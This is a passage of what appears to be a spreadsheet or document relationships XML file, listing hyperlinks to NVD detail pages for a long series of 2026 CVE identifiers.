Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58874" TargetMode="External" Id="rId463" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58941" TargetMode="External" Id="rId464" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62697" TargetMode="External" Id="rId465" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62804" TargetMode="External" Id="rId466" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62810" TargetMode="External" Id="rId467" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68787" TargetMode="External" Id="rId468" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68832" TargetMode="External" Id="rId469" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68841" TargetMode="External" Id="rId470" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68844" TargetMode="External" Id="rId471" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68845" TargetMode="External" Id="rId472" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68848" TargetMode="External" Id="rId473" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68850" TargetMode="External" Id="rId474" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68875" TargetMode="External" Id="rId475" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68877" TargetMode="External" Id="rId476" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68885" TargetMode="External" Id="rId477" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68888" TargetMode="External" Id="rId478" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68890" TargetMode="External" Id="rId479" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68892" TargetMode="External" Id="rId480" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68896" TargetMode="External" Id="rId481" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69265" TargetMode="External" Id="rId482" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69269" TargetMode="External" Id="rId483" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69270" TargetMode="External" Id="rId484" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69277" TargetMode="External" Id="rId485" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69283" TargetMode="External" Id="rId486" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69284" TargetMode="External" Id="rId487" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69289" TargetMode="External" Id="rId488" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69290" TargetMode="External" Id="rId489" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69293" TargetMode="External" Id="rId490" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69295" TargetMode="External" Id="rId491" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69298" TargetMode="External" Id="rId492" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69307" TargetMode="External" Id="rId493" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69312" TargetMode="External" Id="rId494" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69323" TargetMode="External" Id="rId495" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69324" TargetMode="External" Id="rId496" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69328" TargetMode="External" Id="rId497" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69348" TargetMode="External" Id="rId498" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69352" TargetMode="External" Id="rId499" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69359" TargetMode="External" Id="rId500" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69368" TargetMode="External" Id="rId501" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69377" TargetMode="External" Id="rId502" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69389" TargetMode="External" Id="rId503" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69391" TargetMode="External" Id="rId504" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69392" TargetMode="External" Id="rId505" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69407" TargetMode="External" Id="rId506" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69420" TargetMode="External" Id="rId507" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69421" TargetMode="External" Id="rId508" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69424" TargetMode="External" Id="rId509" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69426" TargetMode="External" Id="rId510" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69432" TargetMode="External" Id="rId511" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69433" TargetMode="External" Id="rId512" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69436" TargetMode="External" Id="rId513" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69444" TargetMode="External" Id="rId514" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69445" TargetMode="External" Id="rId515" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69447" TargetMode="External" Id="rId516" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69450" TargetMode="External" Id="rId517" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69455" TargetMode="External" Id="rId518" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69456" TargetMode="External" Id="rId519" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69459" TargetMode="External" Id="rId520" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69467" TargetMode="External" Id="rId521" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69475" TargetMode="External" Id="rId522" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69476" TargetMode="External" Id="rId523" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69478" TargetMode="External" Id="rId524" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69480" TargetMode="External" Id="rId525" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69489" TargetMode="External" Id="rId526" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69508" TargetMode="External" Id="rId527" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69509" TargetMode="External" Id="rId528" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69513" TargetMode="External" Id="rId529" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69528" TargetMode="External" Id="rId530" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69532" TargetMode="External" Id="rId531" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69534" TargetMode="External" Id="rId532" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69535" TargetMode="External" Id="rId533" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69538" TargetMode="External" Id="rId534" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69541" TargetMode="External" Id="rId535" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69542" TargetMode="External" Id="rId536" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69544" TargetMode="External" Id="rId537" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69561" TargetMode="External" Id="rId538" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69571" TargetMode="External" Id="rId539" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69576" TargetMode="External" Id="rId540" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69580" TargetMode="External" Id="rId541" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69582" TargetMode="External" Id="rId542" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69583" TargetMode="External" Id="rId543" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69584" TargetMode="External" Id="rId544" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69585" TargetMode="External" Id="rId545" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69589" TargetMode="External" Id="rId546" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69592" TargetMode="External" Id="rId547" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69593" TargetMode="External" Id="rId548" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69594" TargetMode="External" Id="rId549" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69604" TargetMode="External" Id="rId550" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69608" TargetMode="External" Id="rId551" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69612" TargetMode="External" Id="rId552" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69685" TargetMode="External" Id="rId553" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69687" TargetMode="External" Id="rId554" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69691" TargetMode="External" Id="rId555" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69707" TargetMode="External" Id="rId556" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69709" TargetMode="External" Id="rId557" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69720" TargetMode="External" Id="rId558" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69725" TargetMode="External" Id="rId559" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69731" TargetMode="External" Id="rId560" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69738" TargetMode="External" Id="rId561" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69758" TargetMode="External" Id="rId562" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69785" TargetMode="External" Id="rId563" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69787" TargetMode="External" Id="rId564" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69790" TargetMode="External" Id="rId565" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69799" TargetMode="External" Id="rId566" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69801" TargetMode="External" Id="rId567" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69821" TargetMode="External" Id="rId568" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69822" TargetMode="External" Id="rId569" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69841" TargetMode="External" Id="rId570" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69844" TargetMode="External" Id="rId571" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69864" TargetMode="External" Id="rId572" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69900" TargetMode="External" Id="rId573" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69907" TargetMode="External" Id="rId574" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69921" TargetMode="External" Id="rId575" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70289" TargetMode="External" Id="rId576" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70334" TargetMode="External" Id="rId577" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70564" TargetMode="External" Id="rId578" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70569" TargetMode="External" Id="rId579" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70572" TargetMode="External" Id="rId580" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70574" TargetMode="External" Id="rId581" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70581" TargetMode="External" Id="rId582" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70583" TargetMode="External" Id="rId583" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70584" TargetMode="External" Id="rId584" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71334" TargetMode="External" Id="rId585" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71337" TargetMode="External" Id="rId586" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71343" TargetMode="External" Id="rId587" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71345" TargetMode="External" Id="rId588" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72929" TargetMode="External" Id="rId589" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72941" TargetMode="External" Id="rId590" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72944" TargetMode="External" Id="rId591" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72946" TargetMode="External" Id="rId592" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72953" TargetMode="External" Id="rId593" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72957" TargetMode="External" Id="rId594" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72965" TargetMode="External" Id="rId595" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72967" TargetMode="External" Id="rId596" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72988" TargetMode="External" Id="rId597" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72990" TargetMode="External" Id="rId598" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72991" TargetMode="External" Id="rId599" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72992" TargetMode="External" Id="rId600" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72993" TargetMode="External" Id="rId601" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72994" TargetMode="External" Id="rId602" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72995" TargetMode="External" Id="rId603" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72996" TargetMode="External" Id="rId604" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72997" TargetMode="External" Id="rId605" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73000" TargetMode="External" Id="rId606" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73001" TargetMode="External" Id="rId607" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73002" TargetMode="External" Id="rId608" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73007" TargetMode="External" Id="rId609" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73011" TargetMode="External" Id="rId610" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73014" TargetMode="External" Id="rId611" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73015" TargetMode="External" Id="rId612" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73020" TargetMode="External" Id="rId613" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73021" TargetMode="External" Id="rId614" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73024" TargetMode="External" Id="rId615" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73026" TargetMode="External" Id="rId616" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-7476" TargetMode="External" Id="rId617" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-7477" TargetMode="External" Id="rId618" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75631" TargetMode="External" Id="rId619" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75771" TargetMode="External" Id="rId620" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75862" TargetMode="External" Id="rId621" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75863" TargetMode="External" Id="rId622" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75992" TargetMode="External" Id="rId623" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76967" TargetMode="External" Id="rId624" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77091" TargetMode="External" Id="rId625" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77489" TargetMode="External" Id="rId626" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77500" TargetMode="External" Id="rId627" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77503" TargetMode="External" Id="rId628" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77904" TargetMode="External" Id="rId629" /><Relationship 